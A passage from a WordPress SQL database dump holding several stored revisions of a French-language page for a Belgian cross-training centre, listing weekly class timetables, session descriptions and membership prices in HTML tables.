0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:53:51', '2013-07-03 16:53:51', '', 11, 'http://www.crosstrainingcenter.be/?p=177', 0, 'revision', '', 0),
(178, 1, '2013-07-03 17:01:04', '2013-07-03 17:01:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table class=\"tabb\">\r\n<tr>\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:01:04', '2013-07-03 17:01:04', '', 11, 'http://www.crosstrainingcenter.be/?p=178', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(182, 1, '2013-07-03 17:05:17', '2013-07-03 17:05:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:05:17', '2013-07-03 17:05:17', '', 11, 'http://www.crosstrainingcenter.be/?p=182', 0, 'revision', '', 0),
(179, 1, '2013-07-03 17:01:59', '2013-07-03 17:01:59', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une 